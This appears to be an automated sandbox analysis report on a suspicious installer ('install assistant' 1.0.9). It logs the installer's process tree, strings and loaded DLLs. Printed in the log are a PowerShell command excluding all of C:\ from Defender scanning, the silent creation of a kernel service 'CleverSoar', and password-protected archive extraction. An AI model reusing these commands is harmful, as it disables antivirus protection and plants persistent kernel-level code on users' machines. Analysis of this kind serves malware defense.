Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.dr | Binary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.dr | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.dr | Binary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.dr | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe | String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | File read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe
Source: unknown | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Process created: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp "C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$20456,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Process created: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp "C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$40272,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
(The three entries above, cmd /c start sc start CleverSoar -> sc start CleverSoar -> conhost.exe, are recorded 16 times in this part of the report, each time from an unknown parent; in one of those 16 the conhost.exe entry is attributed to conhost.exe rather than sc.exe. One further attempt is launched directly by the installer process:)
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Process created: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp "C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$20456,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Process created: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp "C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$40272,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar (this identical process creation is listed 30 times in the report)
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp | Section loaded: dwmapi.dll
